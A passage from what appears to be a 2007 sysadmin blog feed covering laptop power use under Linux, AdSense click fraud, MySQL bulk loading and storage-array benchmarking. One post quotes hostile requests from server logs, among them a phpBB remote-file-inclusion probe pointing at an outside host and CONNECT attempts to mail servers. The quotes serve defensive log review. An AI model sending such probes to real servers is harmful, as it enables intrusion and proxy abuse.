with various settings then just using a browser (reading/typing and sometimes fetching new pages) you can expect to average about 7.5 watts. <br> <br>Using the 3d desktop instead (which does look so much cleaner), power will rise to over 9 watts, giving a 3.5 hour runtime. <br> <br>Powertop will report about 50 or so interrupts per second. Many more if you're using the pad. <br> <br><center>While I type this post up, I am running on battery and power consumption hovers between 8 and 9 watts. LCD brightness is setting 3 out of 7 max, wifi is active.</center> <br> <br>The (older) battery I have here reports "full" at 50 watts - which is about 15% less than its rated capacity. It has probably been through over 150 charge/discharge cycles in its life. <br> <br><b>Disk activity</b> <br>It seems to be difficult to keep the disk idle during casual use. Even with a 30 second commit on the partition, there always seems to be something that needs writing. sysctl vm.block.dump=1 will reveal the programs the dirty the buffers but obviously firefox needs to write cache files, log files and state files are written by daemons. It is difficult to eliminate all of this. <br> <br><b>Future Mods</b> <br>I'd like to perhaps obtain a 64GB solid state 1.8" sandisk/samsung drive to replace the internal 80gb 1.8" drive. The advantages are myraid. Power consumption drops, noise drops to zero and so does heat. The flash drive would also be impervious to vibration. Sony are already shipping TX series with this drive as an option. Unfortunately it is not available on the open market yet, or if it is, only at a usurious price. <br> <br>I'd also like to get the OEM (or otherwise) 11000mah larger battery. The combination of the two (batter + flash drive) would probably provide an ultra-portable that I could use for another 5 years before getting envious of the latest hardware. <br> <br><b>Small rant over the fragility of the screen on the Vaio TX</b> <br>Despite the vaunted carbon fiber case, which is really mostly just a carbon fiber lid, the screen is fragile. The lid is too flexible. If pressure is applied the screen will touch the keys (transfering finger grease). If too much pressure is applied the screen will be damaged or even cracked. Buying a new screen currently costs about $350 on ebay. Compared to my last two vaios (505 and tr/1) this one is the most fragile at least in the LCD department. The keyboard has also started to lose lettering, and the palm rest areas have subtly changed color. Mind you, I do spend hours on it each and every day. <br> <br></b>Current status</b> <br>I update this article every now and again when I find something new. As of the 28th of October I am still searching for the source of the increased idle power consumption (measuring it compared to XP), and working out the best way to kick NetworkManager back after suspend/resume (it sometimes needs that kick).<br><br><a href="http://www.dslreports.com/shownews/Ubuntu-Gutsy-on-Sony-TX-series-TXN19P-88694">read comment(s)</a></p><br clear=all>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/shownews/Ubuntu-Gutsy-on-Sony-TX-series-TXN19P-88694</guid>
<pubDate>Mon, 22 Oct 2007 23:36:57 EDT</pubDate>
</item>
<item>
<title>Adsense Click Fraud - Female Impotence</title>
<description><![CDATA[<p>This morning I noticed a strange phenomena. Every hour or less, one of a bunch of random IPs shows up at the site, loads a random forum page, then does a site search for "Female Impotence", then vanishes. As a consequence, our cloud of "most popular searches" started to include the phrase - hardly a subject our average visitor cares about. The inclusion of this search phrase in our "most popular" prompted my investigation. <br> <br>The range of IPs involved in this search is wide and random - over 156 distinct IPs so far. Most but not all of them are from overseas. Brazil, China, Germany, Hong Kong, Russia, Japan. <br> <br>The user agents they use are variable, they are basically a typical zoo of internet explorer windows browsers. <br> <br>The puzzle is that there is no direct value in getting into our cloud of "most popular searches". It surfaces no external link. It results in no matches on the site itself. It provides no page rank boost. <br> <br>So what could be the incentive? <br> <br>One possibility is that the pharma industry has kicked off a skunk works campaign to create a new market for product that needs one. <a href="http://news.bbc.co.uk/2/hi/health/2621705.stm">this article at the BBC</A> dating from 2003 mentions a report in the UK that pharma is trying to build the market for a new "disease" that of course needs expensive pills. I am cynical enough to want that to be the explanation. But "google trends" doesn't show the search term on their radar at all. <br> <br><a href="http://adsense-high-paying-keywords.blogspot.com/2007/05/top-paying-medical-keywords.html">This blog post says</a> that the phrase is in the top 50 most highly sought after (highly paid) adsense hits. <br> <br>Then.. the penny dropped. This must be click-fraud. If adverts for pills pay $10 a click, and there were over 250 fetches of the search results for 'female impotence', which in turn requests a search block from google, and in turn an advert is clicked, then someone somewhere is out of pocket $2500 from just the hits on our site alone. If these browsers were engaged in 100 other site-based searches they could have racked up a quarter of a million bucks over the last 15 days. And I suppose we've been overpaid as well. <br> <br>I have reported it to google. I have no financial incentive to do so: somehow I doubt I'd have seen a reversal of payments if I didn't report it. In our history of using adsense the daily clicks and payments results in a check later on, with minimal if any deductions. Are their click-fraud systems so sensitive they avoid charge-backs even intra day?  <br> <br>Either way, I doubt this is the very first time we've been an unwitting participant in a click-fraud campaign. <br> <br>Update: It occurred to me that it isn't obvious who gains from this click-fraud. The answer is that it is likely to be reverse click-fraud. If you are competing for adsense placement and can't out-bid a competitor you can just spend her into the ground instead. Aim a botnet at her adverts across a range of sites and either google will cancel the ads due to click fraud or (more likely) they will exceed their budget and the ads will disappear and your (cheaper) ads will appear in their place. Nasty business.<br><a href="http://www.dslreports.com/shownews/Adsense-Click-Fraud-88596">read comment(s)</a></p><br clear=all>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/shownews/Adsense-Click-Fraud-88596</guid>
<pubDate>Fri, 19 Oct 2007 13:37:17 EDT</pubDate>
</item>
<item>
<title>Here comes the rain again, falling on my DSL - </title>
<description><![CDATA[<p>Verizon could use this westell wirespeed modem as a rain guage for my zip code. Rain began at 14:07. Frequency of disconnects corresponds to the strength of the rain. I'm wondering why Verizon network engineers don't collect this info from their vast array of DSL modems then roll trucks to look for and fix the problems  with such bad wiring, rather than waiting for an exasperated customer to waste time calling their support numbers with a probable vague description of the issue ('sometimes, web sites time out'). <br> <br>They could easily run stats to look for weather related problems by looking at grouped failures that correlate with recorded rain in a zip code. <br> <br><div class="code"><pre><span class="codetext"> Events are listed starting from the most recent. **********************************************************************THU OCT 11 15:40:23 2007     PPP DISCONNECTED on VPI 0 VCI 35 : PPP link layer failure  THU OCT 11 15:26:28 2007     PPP CONNECTED on VPI 0 VCI 35  THU OCT 11 15:26:28 2007     Connecting session(0): Auto Registration due to Manual Connect THU OCT 11 15:26:19 2007     Disconnecting session(-1):  due to PADT received THU OCT 11 15:26:19 2007     PPP DISCONNECTED on VPI 0 VCI 35 : PPP commanded down THU OCT 11 15:26:19 2007     Disconnecting session(0): Auto Registration due to dsl Restart THU OCT 11 15:23:30 2007     PPP CONNECTED on VPI 0 VCI 35  THU OCT 11 15:23:30 2007     Connecting session(0): Auto Registration due to Manual Connect THU OCT 11 15:23:21 2007     Disconnecting session(-1):  due to PADT received THU OCT 11 15:23:21 2007     PPP DISCONNECTED on VPI 0 VCI 35 : PPP commanded down THU OCT 11 15:23:21 2007     Disconnecting session(0): Auto Registration due to dsl Restart THU OCT 11 15:07:07 2007     PPP CONNECTED on VPI 0 VCI 35  THU OCT 11 15:07:07 2007     Connecting session(0): Auto Registration due to Manual Connect THU OCT 11 15:06:58 2007     Disconnecting session(-1):  due to PADT received THU OCT 11 15:06:58 2007     PPP DISCONNECTED on VPI 0 VCI 35 : PPP commanded down THU OCT 11 15:06:58 2007     Disconnecting session(0): Auto Registration due to dsl Restart THU OCT 11 14:59:03 2007     PPP CONNECTED on VPI 0 VCI 35  THU OCT 11 14:59:02 2007     Connecting session(0): Auto Registration due to Manual Connect THU OCT 11 14:58:53 2007     Disconnecting session(-1):  due to PADT received THU OCT 11 14:58:53 2007     PPP DISCONNECTED on VPI 0 VCI 35 : PPP commanded down THU OCT 11 14:58:53 2007     Disconnecting session(0): Auto Registration due to dsl Restart THU OCT 11 14:45:33 2007     PPP CONNECTED on VPI 0 VCI 35  THU OCT 11 14:45:33 2007     Connecting session(0): Auto Registration due to Manual Connect THU OCT 11 14:45:24 2007     Disconnecting session(-1):  due to PADT received THU OCT 11 14:45:24 2007     PPP DISCONNECTED on VPI 0 VCI 35 : PPP commanded down THU OCT 11 14:45:24 2007     Disconnecting session(0): Auto Registration due to dsl Restart THU OCT 11 14:35:49 2007     PPP CONNECTED on VPI 0 VCI 35  THU OCT 11 14:35:49 2007     Connecting session(0): Auto Registration due to Manual Connect THU OCT 11 14:35:40 2007     Disconnecting session(-1):  due to PADT received THU OCT 11 14:35:40 2007     PPP DISCONNECTED on VPI 0 VCI 35 : PPP commanded down THU OCT 11 14:35:40 2007     Disconnecting session(0): Auto Registration due to dsl Restart THU OCT 11 14:07:26 2007     PPP CONNECTED on VPI 0 VCI 35  THU OCT 11 14:07:26 2007     Connecting session(0): Auto Registration due to Manual Connect THU OCT 11 14:07:17 2007     Disconnecting session(-1):  due to PADT received THU OCT 11 14:07:17 2007     PPP DISCONNECTED on VPI 0 VCI 35 : PPP commanded down THU OCT 11 14:07:17 2007     Disconnecting session(0): Auto Registration due to dsl Restart WED OCT 10 00:25:53 2007     PPP CONNECTED on VPI 0 VCI 35  </span></pre></div><br><a href="http://www.dslreports.com/shownews/Here-comes-the-rain-again-falling-on-my-DSL-88343">read comment(s)</a></p><br clear=all>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/shownews/Here-comes-the-rain-again-falling-on-my-DSL-88343</guid>
<pubDate>Thu, 11 Oct 2007 16:19:05 EDT</pubDate>
</item>
<item>
<title>Probing for open proxies with CONNECT - </title>
<description><![CDATA[<p>Looking through server logs just has to be done regularly. After ignoring mine for some time, I did my regular audit recently and found some unpleasant surprises. My first observation is that the number of bots probing for open proxy servers with syntax such as this: <br><div class="code"><pre><span class="codetext"> GET &amp;raquo;&lt;A HREF="http://californianloans.com/ProxyHeader.php " &gt;californianloans.com/ProxyHeader.php &lt;/A&gt;GET &amp;raquo;&lt;A HREF="http://clickingagent.com/proxycheck.php?ip=209.123.109.175&amp;port=80&amp;loc= " &gt;clickingagent.com/proxycheck.php&amp;middot;&amp;middot;&amp;middot;80&amp;loc= &lt;/A&gt;POST &amp;raquo;&lt;A HREF="http://89.149.241.191/d3sUpER3fg.php" &gt;89.149.241.191/d3sUpER3fg.php&lt;/A&gt;  </span></pre></div>has increased dramatically. In a single day we get over 1000 such requests from over 400 different IP addresses. <br> <br>This was an unfortunate waste of bandwidth because we don't show a 403 error page for invalid URLs, instead we redirect invalid URLs to our home page. <br> <br>The next hassle is the rise of bots looking for web servers which respond to the CONNECT command. I didn't even know this command existed in the spec, but it is listed there, right after GET, POST and HEAD. The typical CONNECT command is: <br> <br><div class="code"><pre><span class="codetext"> CONNECT 204.126.127.253:25 CONNECT 202.248.238.10:25 : </span></pre></div> <br>Where these IPs are well known mail servers. 45 different IPs a day are trying this, some over 100 times per day. <br> <br>As well as this noise of course there are the normal stream of probes for badly configured php admin programs and other exploitable standard packages: <br> <br><div class="code"><pre><span class="codetext"> GET ..admin_users.php?phpbb_root_path=http://124.0.201.20/bbs000/test.txt? </span></pre></div> <br>Here test.txt at 124.0.201.20 is fetched by the vulnerable script, and therefore the script can be used as a dumb proxy server if the URL succeeds. <br> <br>It is worth paying attention to your access_log and error_log. The amount of noise directed against public web servers has clearly risen as the cost of generating the noise (via compromised bot nets) drops to nearly zero. <br> <br>On the topic of logs: With the increasing power of web servers to deal with normal traffic, you can also increase the amount of logging they do. Apache 2.x has a useful millisecond per request field which I immediately added to my CustomLog line so that I could write a program to tail the log, and dynamically generate a live chart of response times, request response sizes, and error codes. <br> <br>Here is a snapshot, but mine refreshes every few seconds: <br>&raquo;<A HREF="/front/frontend.html ">/front/frontend.html </A><br> <br>If you watch the general shape of this graph it becomes quite easy to determine if things have skewed in some way to the point of abnormality. In fact, I'll probably add to this program to display a long term average on the right and the current very short term view on the left.<br><br><a href="http://www.dslreports.com/shownews/Probing-for-open-proxies-with-CONNECT-88338">read comment(s)</a></p><br clear=all>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/shownews/Probing-for-open-proxies-with-CONNECT-88338</guid>
<pubDate>Thu, 11 Oct 2007 12:04:57 EDT</pubDate>
</item>
<item>
<title>Mysql and a billion rows using innodb - </title>
<description><![CDATA[<p>I'm working on recreating and reloading our 'reverse index' that is used for site search. This reverse indexes 19 million forum posts and a few other smaller collections of text, generating one (weighted) record per unique "word" per object. That is how one reaches a billion rows: Average 50 unique "words" per "item" x 20 million "items" = 1 billion records. <br> <br>I have some random timings for your amusement: <br> <br><b>1. creating it in the first place.</b> <br>Surprisingly, this is the least dramatic part of the job. Reading all the plain text, stripping format, splitting it up into words, creating all the location objects in another (mere 20 million row) data table, and then dumping the final file as 19gb of text file takes "only" a couple of hours. It could be much faster if I ran this job 4 times in parallel (and pushed our mysql server to deliver the old posts more quickly). <br> <br><b>2. Simply reading the entire file.</b> <br>Since it is 19gb and the disk array can do ~150mb/sec sequential read then obviously even reading the entire file once from end to end is going to take a few minutes to do. Modifying it or removing items is really tricky. So it better be right from the word go! <br> <br><b>3. Loading this data into mysql.</b> <br>The fastest way to load data into a mysql table is to use batch inserts that to make large single transactions (megabytes each). The syntax is something like: <br>insert ignore into table (fields) values (....),(....),(...) <br>The 'ignore' is so one possible duplicate doesn't blow out the entire insert. <br>Inserting un-ordered into mysql/myisam like this, with perl creating the insert strings, can be done at a high rate of speed if the table does not have an index. Testing this shows it running in less than 1 hour (way over 300,000 rows per second inserted). <br> <br><b>4. Sorting in mysql, space usage in myisam and InnoDB</b> <br>Doing a table sort in mysql is a killer. I don't actually know the runtime. I gave up after a couple of hours. I don't even know whether the runtime is exponential with the size of the table, or linear. Interestingly, sorting and then just selecting the 'top' items by limit is very quick, in the order of 10 minutes or so. This high speed for "limit N" sort is also reported by the excellent mysql performance blog: <a href="http://www.mysqlperformanceblog.com/2007/08/18/how-fast-can-you-sort-data-with-mysql/">how fast can you sort data with mysql?</a>. The table in mysql takes little more space than the text file to store as myisam, but it balloons to more than 40gb of data under innodb, or 65gb if it is fragmented - and innodb optimize/defragment is famously slow! I'm afraid of running it. So I should sort the data before inserting it. I want maximum clustering for these 7 years worth of old data, even if new data will slowly degrade the clustering. <br> <br><b>5. Sorting the data using gnu unix sort</b> <br>Sorting a billion rows is handled by unix sort with sort/merge passes. It creates as many temporary files as you are prepared to allocate in memory. If you do: <br>sort -s 2g <br>(which instructs sort to use 2gb of memory) then sort creates 700mb temporary files at a rate of about one file every 2 minutes. The overall sort time is around one hour. If sort was multi-threaded it could be as many times faster as you have cores available. <br> <br><b>6. Loading it all into mysql InnoDB</b> <br>First attempt, with two indexes, innodb quickly slows down to approx 5000 to 7000 rows per second. At 6000 rows a second fully loading this table would take over 24 hours! If speed further declined, this could stretch further. An unacceptable result with a lot of uncertainty during execution (will it ever finish?). <br>Removing a tiny secondary index (which nevertheless internally duplicates the PK), setting innodb_flush_log_at_trx_commit=0 from 2 (not recommended for production), setting innodb_flush_method=O_DIRECT, increasing the innodb_buffer_pool_size to 10g from 6g, further increasing the insert packet size to 25k rows per insert, and setting a write lock on the table, the insertion rate starts at 100,000 per second but quickly slows to ~50,000 per second where (hooray) it appears to be stable. If it can maintain this average it will be done in 5 hours. This is 10x faster. I suppose only one change was responsible for most of this improvement. I don't know which, however. <br>With 4 cores during this procedure approx 2 are occupied, and disk i/o averages about 15mb/sec write. (The perl loader that is reading the flat file and building the insert transactions is only taking 10% of one core). <br>Since there is still disk subsystem bandwidth (only a small percentage of time is disk-wait) plus with 50% idle net cpu capacity, bulk inserts like this are not fully taking advantage of more than two cores. <br> <br>After "tuning" and during the bulk insert: <br><div class="code"><pre><span class="codetext"> ===================================== 070925 21:22:33 INNODB MONITOR OUTPUT ===================================== Per second averages calculated from the last 44 seconds ---------- SEMAPHORES ---------- OS WAIT ARRAY INFO: reservation count 13714, signal count 13691 Mutex spin waits 0, rounds 483238, OS waits 5541 RW-shared spins 8377, OS waits 4122; RW-excl spins 8187, OS waits 3950 ------------ TRANSACTIONS ------------ Trx id counter 0 505355010 Purge done for trx's n:o &lt; 0 505352977 undo n:o &lt; 0 0 History list length 5 Total number of lock structs in row lock hash table 0 LIST OF TRANSACTIONS FOR EACH SESSION: ---TRANSACTION 0 0, not started, process no 24763, OS thread id 1151719744 MySQL thread id 98, query id 46658 localhost root show innodb status ---TRANSACTION 0 0, not started, process no 24763, OS thread id 1150916928 MySQL thread id 97, query id 46590 orange.dslreports.com 192.168.1.200 dslreports ---TRANSACTION 0 505355009, ACTIVE 1 sec, process no 24763, OS thread id 1149913408 inserting, thread declared inside InnoDB 330 mysql tables in use 3, locked 3 3 lock struct(s), heap size 368, 0 row lock(s), undo log entries 11693 MySQL thread id 54, query id 46633 orange.dslreports.com 192.168.1.200 dslreports update insert ignore into ReverseIndex (ReverseIndex_Word, ReverseIndex_Score, Location_ID, y) values ('afraid',0.5,35358162,2001),('afraid',0.5,35358237,2001),('afraid',0.5,35358371,2001),('afraid',0.5,35358565,2001),('afraid',0.5,35358973,2001),('afraid',0.5,3535963,2006),('afraid',0.5,35360270,2001),('afraid',0.5,3536096,2006),('afraid',0.5,35360979,2001),('afraid',0.5,35366742,2001),('afraid',0.5,35366837,2001),('afraid',0.5,35367484,2001),('afraid',0.5,35368671,2001),('afraid',0.5,35368926,2001),('afraid',0.5,35369066,2001),('afraid',0.5,35369144,2001),('afraid',0.5,35369736,2001),('afraid',0.5, -------- FILE I/O -------- I/O thread 0 state: waiting for i/o request (insert buffer thread) I/O thread 1 state: waiting for i/o request (log thread) I/O thread 2 state: waiting for i/o request (read thread) I/O thread 3 state: waiting for i/o request (write thread) Pending normal aio reads: 0, aio writes: 0,  ibuf aio reads: 0, log i/o's: 0, sync i/o's: 0 Pending flushes (fsync) log: 0; buffer pool: 0 34941 OS file reads, 94666 OS file writes, 14986 OS fsyncs 0.91 reads/s, 17612 avg bytes/read, 28.39 writes/s, 10.50 fsyncs/s ------------------------------------- INSERT BUFFER AND ADAPTIVE HASH INDEX ------------------------------------- Ibuf: size 5646, free list len 22374, seg size 28021, 0 inserts, 1249359 merged recs, 27611 merges Hash table size 21249871, used cells 656746, node heap has 985 buffer(s) 18078.50 hash searches/s, 37474.85 non-hash searches/s --- LOG --- Log sequence number 37 4230141094 Log flushed up to   37 4226707564 Last checkpoint at  37 3650382906 0 pending log writes, 0 pending chkp writes 5899 log i/o's done, 2.32 log i/o's/second ---------------------- BUFFER POOL AND MEMORY ---------------------- Total memory allocated 11492247262; in additional pool allocated 10723840 Dictionary memory allocated 50960 Buffer pool size   655360 Free buffers       351098 Database pages     303277 Modified db pages  33971 Pending reads 0 Pending writes: LRU 0, flush list 0, single page 0 Pages read 39106, created 264171, written 316562 0.98 reads/s, 331.22 creates/s, 341.90 writes/s Buffer pool hit rate 1000 / 1000 -------------- ROW OPERATIONS -------------- 1 queries inside InnoDB, 0 queries in queue 1 read views open inside InnoDB 3 tablespace extents now reserved for B-tree split operations Main thread process no. 24763, id 1140881728, state: sleeping Number of rows inserted 50820193, updated 0, deleted 0, read 2 54743.46 inserts/s, 0.00 updates/s, 0.00 deletes/s, 0.00 reads/s </span></pre></div> <br>before: <br><div class="code"><pre><span class="codetext"> Per second averages calculated from the last 32 seconds ---------- SEMAPHORES ---------- OS WAIT ARRAY INFO: reservation count 119377, signal count 118789 Mutex spin waits 0, rounds 24466870, OS waits 79493 RW-shared spins 30137, OS waits 14091; RW-excl spins 74491, OS waits 17320 ------------ TRANSACTIONS ------------ Trx id counter 0 505351913 Purge done for trx's n:o &lt; 0 505325357 undo n:o &lt; 0 0 History list length 18 Total number of lock structs in row lock hash table 0 LIST OF TRANSACTIONS FOR EACH SESSION: ---TRANSACTION 0 0, not started, process no 23767, OS thread id 1153526080 MySQL thread id 27375, query id 83255267 localhost root show innodb status ---TRANSACTION 0 0, not started, process no 23767, OS thread id 1149110592 MySQL thread id 27384, query id 83255200 orange.dslreports.com 192.168.1.200 dslreports ---TRANSACTION 0 505351912, ACTIVE 0 sec, process no 23767, OS thread id 1150515520 inserting, thread declared inside InnoDB 163 mysql tables in use 3, locked 3 3 lock struct(s), heap size 368, 0 row lock(s), undo log entries 1841 MySQL thread id 25258, query id 83255261 orange.dslreports.com 192.168.1.200 dslreports update insert ignore into ReverseIndex (ReverseIndex_Word, ReverseIndex_Score, Location_ID, y) values ('everything',0.5,38147190,2000),('everything',0.5,3814720,2006),('everything',0.5,38147203,2000),('everything',0.5,38147324,2000),('everything',0.5,38147344,2000),('everything',0.5,38147368,2000),('everything',0.5,38147432,2000),('everything',0.5,38147447,2000),('everything',0.5,3814753,2006),('everything',0.5,38147570,2000),('everything',0.5,38147600,2000),('everything',0.5,38147624,2000),('everything',0.5,38147672,2000),('everything',0.5,38147684,2000),('everything',0.5,38147760,2000),('everything -------- FILE I/O -------- I/O thread 0 state: waiting for i/o request (insert buffer thread) I/O thread 1 state: waiting for i/o request (log thread) I/O thread 2 state: waiting for i/o request (read thread) I/O thread 3 state: waiting for i/o request (write thread) Pending normal aio reads: 0, aio writes: 0,  ibuf aio reads: 0, log i/o's: 0, sync i/o's: 0 Pending flushes (fsync) log: 0; buffer pool: 1 44374 OS file reads, 78902654 OS file writes, 383233 OS fsyncs 14.84 reads/s, 17280 avg bytes/read, 187.46 writes/s, 22.91 fsyncs/s ------------------------------------- INSERT BUFFER AND ADAPTIVE HASH INDEX ------------------------------------- Ibuf: size 16778, free list len 8408, seg size 25187, 5103138 inserts, 2021625 merged recs, 38211 merges Hash table size 12750011, used cells 7987928, node heap has 18521 buffer(s) 8803.85 hash searches/s, 5457.74 non-hash searches/s --- LOG --- Log sequence number 36 2142170188 Log flushed up to   36 2141719998 Last checkpoint at  36 1564120222 0 pending log writes, 0 pending chkp writes 77784071 log i/o's done, 3.16 log i/o's/second ---------------------- BUFFER POOL AND MEMORY ---------------------- Total memory allocated 6921245678; in additional pool allocated 10765312 Dictionary memory allocated 56840 Buffer pool size   393216 Free buffers       32 Database pages     374663 Modified db pages  270643 Pending reads 0 Pending writes: LRU 0, flush list 1, single page 0 Pages read 92038, created 2499921, written 13243868 15.66 reads/s, 32.69 creates/s, 815.47 writes/s Buffer pool hit rate 1000 / 1000 -------------- ROW OPERATIONS -------------- 1 queries inside InnoDB, 0 queries in queue 1 read views open inside InnoDB Main thread process no. 23767, id 1140881728, state: sleeping Number of rows inserted 400273553, updated 0, deleted 154959, read 131020195 6169.28 inserts/s, 0.00 updates/s, 0.00 deletes/s, 0.00 reads/s </span></pre></div> <br>The server is mysql 5.1.21-beta-log  running on x86_64 Suse 10 SP1 with 16gb of memory/ Intel 5140 cpus (2 x dual core) connected to the afore-benchmarked MD3000 disk enclosure. The filesystem is XFS, over two striped LUNs using LVM.<br><br><a href="http://www.dslreports.com/shownews/Mysql-and-a-billion-rows-using-innodb-87890">read comment(s)</a></p><br clear=all>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/shownews/Mysql-and-a-billion-rows-using-innodb-87890</guid>
<pubDate>Tue, 25 Sep 2007 22:27:32 EDT</pubDate>
</item>
<item>
<title>domain name shopping - </title>
<description><![CDATA[<p>Back in May I had an "idea" for a new site and got sucked into looking at available domain names. If you want your new domain name to actually MEAN something you are stuck buying it from a domain name bank of some kind. <br> <br>I made an inquiry through buydomains.com for the name I was interested in. They run some kind of feeble ongoing "domain auction" site that tries to look like ebay but actually has very little actual commerce. <br> <br>I didn't like the initial price I received, USD 1288, and when I questioned the price and the fact I also got a cellphone call, I got this reply: <br><div class="bquote"> <br>I might have called.  The prices we quote are based on the price we paid <br>for the name as well as the revenue it generates as a parked name.  We <br>pay much more than just a registration fee for each of the 800,000 names <br>we own.  That being said I do have room for negotiation and would like <br>to try and come up with a price we can both agree on.  What would be the <br>best number to call you at so we can take a minute to talk about it? <br> <br>Jay Wladkowski <br>Account Executive <br>BuyDomains Division <br>NameMedia, Inc. <br>230 Third Avenue, 2nd Floor <br>Waltham, MA  02451 <br></div> <br> <br>Account Executive huh? Yeah Right. Goodbye! <br> <br>Since that day over the subsequent months I've been spammed both by phone (calls I ignore) and by email with the following subject lines: <br> <br>Agressive Pricng Now Through June 30th <br>July Savings on .....net <br>Summer Discount on .....net <br>Back to Business Domain Savings <br>New Discount on ....net <br> <br>With similar message bodies all encouraging me to call and get the new one-time-only, special deal on the domain name I was interested in. <br> <br>I hate the way they do business. If the domain name is only of interest to me and nobody else, then the market price is what *I* offer. Yet they would rather hold onto this worthless (to them) name and keep on plugging away hoping that the nibble they got is a fish. <br> <br>What a horrible business to be in.<br><a href="http://www.dslreports.com/shownews/domain-name-shopping-87513">read comment(s)</a></p><br clear=all>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/shownews/domain-name-shopping-87513</guid>
<pubDate>Thu, 13 Sep 2007 13:01:44 EDT</pubDate>
</item>
<item>
<title>Benchmarking the MD3000 powervault under linux - </title>
<description><![CDATA[<p><div style="padding:4px; border: 1px solid red;">Second update: I have finished comparing RAID5 to RAID10. RAID5 is about 20% faster with sequential reads but 20% slower with sequential writes. Orion reports that the total throughput over two RAID5 LUNs is about 20% slower than against two RAID10 LUNs with a 5:95 write:read ratio. Maximum sustained IOP/sec on the "small I/O" test also dropped from over 6000 to 4000 - a 30% decrease. My conclusion is therefore that unless you need maximum possible sequential read performance or maximum possible space utilisation one should avoid RAID5 and pick RAID10.</div> <br><div style="padding:4px; border: 1px solid red;">Update: Just a day after posting this Dell <A HREF="http://www.dell.com/downloads/global/products/pvaul/en/pvaul_md3000i_specs.pdf">releases the MD3000i</A> which appears to be an MD3000 using gig/e ports instead of SAS ports. Again, the performance of the Dell MD3000i is entirely obscure but my guess is that it is the same as the MD3000. The controller software certainly sounds very familiar! At least this time the "fully equipped" MD3000i with four gig/e ports can blame any benchmark results on the maximum wire speed of 4 gig/e ports (less than 100mb/sec x 4).</div> <br>I've been spending some time benchmarking the Dell MD-3000 powervault storage array under SuSE 10.2 x86_64 linux. There isn't a lot of information out there on this unit, one of the more useful pages I found is on this blog: <A HREF="http://all.thingsit.com/archives/5">Performance of the MD3000 with ORION</A>. In summary: it is ok for the price we paid (half retail), but this storage array, with the guts of an old IBM DS4100 which had an anemic 485 MB/sec internal bus speed, is not able to max out the total sequential read or write performance of the 15 disks it is able to contain. I imagine if you expand it with MD-1000 enclosures this deficit is even more obvious. More on that later. <br> <br><div class="wiki"><h3>The setup</h3></div>Two Dell 1950 hosts, each with two SAS/5e HBA (host bus adapter cards). The idea is to setup a highly available configuration. The SAS/5e cards each have two ports but since the MD3000 has a maximum of 4 ports (two per physical controller module) I am only using ONE port on each card, and four SAS cables. Both Dell 1950 poweredge hosts also have two internal drives connected to PERC5/i configured as a single mirror for the OS. The MD3000 does not support booting a Host OS. It is fully populated with 15 SAS seagate 15k (136gb usable) drives. <br> <br><div class="wiki"><h3>Theoretical throughput</h3></div>Each SAS5/e card is PCI-X, and each slot has a dedicated bus on the 1950. Each SAS cable runs at 3 gigabit/second full duplex. Each of the 15 drives can sustain a sequential read of about 90/mb a second and a write of nearly that much. If they were 300gb drives then read performance would be over 100mb/sec. There is a little if any information from Dell on how the 15 drives are connected to the controller modules. <br> <br> att=1213246,r,400 The Dell advertising blurb describes the MD3000 as having a possible peak bandwidth of 1400MB/sec: <br><div class="bquote">Active-active RAID controllers can produce throughputs up to 1400MB/sec and approximately 90000 IOPS from cache</div> <br>I wonder if it can reach that speed? <br> <br><div class="wiki"><h3>Multi-path support the Dell way</h3></div>Since each host is connected to the MD3000 via two HBAs, two cables and two MD3000 controller modules, transparent fail-over support would be an obvious item on the wish-list. The Dell resource CD provides an RDAC module that you are required to compile up yourself, and a newer mptsas kernel driver. There were several problems implementing things as Dell expect you to: <br><ul>&#8226;Dell provided mptsas does not compile on vanilla kernel releases after 2.6.20 (such as fedora core 7) due to an API change to the work queues</li>&#8226;Dell provided mptsas does not compile on distro kernels patched for "wide port API" because the code checks for kernel version 2.6.18 or more before enabling it. SuSE 10.2 is, for example, kernel 2.6.16 (with patches). This is easily fixed by adding two #defines.</li>&#8226;I also had trouble compiling up RDAC due to an incorrect symlink.</li>&#8226;The Dell provided mptsas module is newer than the LSI official drivers, but there are no release notes or history for it so it isn't clear what it fixes or adds vs the standard module from LSI.</li></ul> <br>After trying the array successfully with Fedora Core 5, CentOS5 (which is RHEL 5 64bit) and exploring all the above issues, in the end I settled on SuSE SLES-10-SP1 x86_64 (Suse 10 service pack 1 for 64bit) and used it as-is, there was no need to install anything other than the Java "SMdevices/SMmonitor/SMagent" stuff on the resource CD. <br> <br><div class="wiki"><h3>Multi-path support via multipath tools</h3></div>As an alternative to the IBM/Dell RDAC solution I went with multipath-tools. <br> <br><A href="http://christophe.varoqui.free.fr/">Linux multipath tools</A> provide some amount of device independent support for multipath IO. In brief once configured correctly they export /dev/dm-N devices that one should use instead of /dev/sd? devices. The /dev/dm-N devices are transparently (hopefully!) failed over and back depending on what the multipath demon finds is going wrong with the underlying devices. <br> <br>The problem with using multipath-tools on this MD3000 is that you must verify your kernel can speak RDAC in the device-mapper. This support comes in the form of a <A HREF="http://www.kernel.org/pub/linux/kernel/people/agk/patches/2.6/2.6.22/">bunch of device mapper kernel patches</A>, and fedora core 7 and perhaps most other distros do not have these by default. (I'm out of my depth here!). You'll know that you've not got them because you can't make multipath-tools work. SuSE 10.2 does have the patches. <br> <br>The multipath configuration file that I used is: <br> <br><div class="code"><pre><span class="codetext"> defaults {         getuid_callout "/sbin/scsi_id -g -u -s /block/%n" } devices {         device {                 vendor DELL*                 product MD3000*                 path_grouping_policy failover                 getuid_callout "/sbin/scsi_id -g -u -s /block/%n"                 features "1 queue_if_no_path" #               path_checker readsector0                 path_checker rdac                 prio_callout "/sbin/mpath_prio_tpc /dev/%n"                 hardware_handler "1 rdac"                 failback immediate         } } blacklist {        device {                vendor Dell.*                product Universal.*        }        device {                vendor Dell.*                product Virtual.*        } } </span></pre></div> <br>As you can see, I don't want multipath tools to try to probe either the DRAC5 management card "virtual devices", or the MD3000 management "Access disk" which appears as a 20gb drive that can't be used as a filesystem. Notice that the configuration file refers to the aforementioned kernel rdac support! (this is not the same as the Dell RDAC driver). Without the right kernel, the "path_checker" line will fail to work as will the "hardware_handler" line. <br> <br>If all multipath-tools are installed without error then after fresh boot you can do something like this (the -d flag is "dry run" and is more likely to get you output than just -ll if you have any other issues with missing kernel features): <br> <br><div class="code"><pre><span class="codetext"> # multipath -ll -d 